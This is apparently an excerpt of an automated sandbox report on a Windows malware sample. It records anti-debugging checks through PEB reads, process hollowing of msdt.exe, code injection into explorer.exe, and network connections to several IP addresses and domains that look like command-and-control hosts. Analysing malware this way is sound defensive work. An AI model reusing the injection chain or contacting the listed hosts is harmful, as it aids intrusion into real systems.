          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F23D34 mov eax, dword ptr fs:[00000030h]5_2_00F23D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8D34 mov eax, dword ptr fs:[00000030h]5_2_00FE8D34
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F9A537 mov eax, dword ptr fs:[00000030h]5_2_00F9A537
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]5_2_00F44D3B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]5_2_00F44D3B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F44D3B mov eax, dword ptr fs:[00000030h]5_2_00F44D3B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F276E2 mov eax, dword ptr fs:[00000030h]5_2_00F276E2
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F416E0 mov ecx, dword ptr fs:[00000030h]5_2_00F416E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FE8ED6 mov eax, dword ptr fs:[00000030h]5_2_00FE8ED6
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F58EC7 mov eax, dword ptr fs:[00000030h]5_2_00F58EC7
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F436CC mov eax, dword ptr fs:[00000030h]5_2_00F436CC
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FCFEC0 mov eax, dword ptr fs:[00000030h]5_2_00FCFEC0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF20A0 mov eax, dword ptr fs:[00000030h]15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov ecx, dword ptr fs:[00000030h]15_2_04AFF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov eax, dword ptr fs:[00000030h]15_2_04AFF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFF0BF mov eax, dword ptr fs:[00000030h]15_2_04AFF0BF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B090AF mov eax, dword ptr fs:[00000030h]15_2_04B090AF
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC9080 mov eax, dword ptr fs:[00000030h]15_2_04AC9080
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43884 mov eax, dword ptr fs:[00000030h]15_2_04B43884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B43884 mov eax, dword ptr fs:[00000030h]15_2_04B43884
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AD849B mov eax, dword ptr fs:[00000030h]15_2_04AD849B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC58EC mov eax, dword ptr fs:[00000030h]15_2_04AC58EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B814FB mov eax, dword ptr fs:[00000030h]15_2_04B814FB
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]15_2_04B46CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]15_2_04B46CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46CF0 mov eax, dword ptr fs:[00000030h]15_2_04B46CF0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov ecx, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5B8D0 mov eax, dword ptr fs:[00000030h]15_2_04B5B8D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98CD6 mov eax, dword ptr fs:[00000030h]15_2_04B98CD6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF002D mov eax, dword ptr fs:[00000030h]15_2_04AF002D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFBC2C mov eax, dword ptr fs:[00000030h]15_2_04AFBC2C
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]15_2_04ADB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]15_2_04ADB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]15_2_04ADB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADB02A mov eax, dword ptr fs:[00000030h]15_2_04ADB02A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]15_2_04B47016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]15_2_04B47016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B47016 mov eax, dword ptr fs:[00000030h]15_2_04B47016
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B94015 mov eax, dword ptr fs:[00000030h]15_2_04B94015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B94015 mov eax, dword ptr fs:[00000030h]15_2_04B94015
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]15_2_04B9740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]15_2_04B9740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B9740D mov eax, dword ptr fs:[00000030h]15_2_04B9740D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B81C06 mov eax, dword ptr fs:[00000030h]15_2_04B81C06
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]15_2_04B46C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]15_2_04B46C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]15_2_04B46C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46C0A mov eax, dword ptr fs:[00000030h]15_2_04B46C0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE746D mov eax, dword ptr fs:[00000030h]15_2_04AE746D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B82073 mov eax, dword ptr fs:[00000030h]15_2_04B82073
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B91074 mov eax, dword ptr fs:[00000030h]15_2_04B91074
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA44B mov eax, dword ptr fs:[00000030h]15_2_04AFA44B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5C450 mov eax, dword ptr fs:[00000030h]15_2_04B5C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B5C450 mov eax, dword ptr fs:[00000030h]15_2_04B5C450
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE0050 mov eax, dword ptr fs:[00000030h]15_2_04AE0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE0050 mov eax, dword ptr fs:[00000030h]15_2_04AE0050
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]15_2_04B451BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]15_2_04B451BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]15_2_04B451BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B451BE mov eax, dword ptr fs:[00000030h]15_2_04B451BE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF35A1 mov eax, dword ptr fs:[00000030h]15_2_04AF35A1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF61A0 mov eax, dword ptr fs:[00000030h]15_2_04AF61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF61A0 mov eax, dword ptr fs:[00000030h]15_2_04AF61A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B469A6 mov eax, dword ptr fs:[00000030h]15_2_04B469A6
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]15_2_04AF1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]15_2_04AF1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF1DB5 mov eax, dword ptr fs:[00000030h]15_2_04AF1DB5
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AC2D8A mov eax, dword ptr fs:[00000030h]15_2_04AC2D8A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFA185 mov eax, dword ptr fs:[00000030h]15_2_04AFA185
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AEC182 mov eax, dword ptr fs:[00000030h]15_2_04AEC182
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2581 mov eax, dword ptr fs:[00000030h]15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFD9B mov eax, dword ptr fs:[00000030h]15_2_04AFFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AFFD9B mov eax, dword ptr fs:[00000030h]15_2_04AFFD9B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF2990 mov eax, dword ptr fs:[00000030h]15_2_04AF2990
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B78DF1 mov eax, dword ptr fs:[00000030h]15_2_04B78DF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]15_2_04ACB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]15_2_04ACB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ACB1E1 mov eax, dword ptr fs:[00000030h]15_2_04ACB1E1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]15_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04ADD5E0 mov eax, dword ptr fs:[00000030h]15_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B541E8 mov eax, dword ptr fs:[00000030h]15_2_04B541E8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov ecx, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B46DC9 mov eax, dword ptr fs:[00000030h]15_2_04B46DC9
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B4A537 mov eax, dword ptr fs:[00000030h]15_2_04B4A537
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B98D34 mov eax, dword ptr fs:[00000030h]15_2_04B98D34
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov eax, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AE4120 mov ecx, dword ptr fs:[00000030h]15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]15_2_04AF4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]15_2_04AF4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF4D3B mov eax, dword ptr fs:[00000030h]15_2_04AF4D3B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04AF513A mov eax, dword ptr fs:[00000030h]15_2_04AF513A
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AC9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AEB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AC52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ADAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AFFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AFD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B04A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AD8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AE3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AC5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AC5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B0927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B7B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B98A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B54257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AC9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B95BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AD1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B8138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B7D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AFB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B8131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B98B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Network Connect: 81.169.145.161 80
          Source: C:\Windows\explorer.exe | Domain query: www.mambacustomboats.com
          Source: C:\Windows\explorer.exe | Domain query: www.sanlifalan.com
          Source: C:\Windows\explorer.exe | Domain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exe | Network Connect: 104.165.34.6 80
          Source: C:\Windows\explorer.exe | Network Connect: 108.167.135.122 80
          Source: C:\Windows\explorer.exe | Network Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exe | Domain query: www.ribbonofficial.com
          Source: C:\Windows\explorer.exe | Domain query: www.floaterslaser.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 2F0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Thread register set: target process: 3472
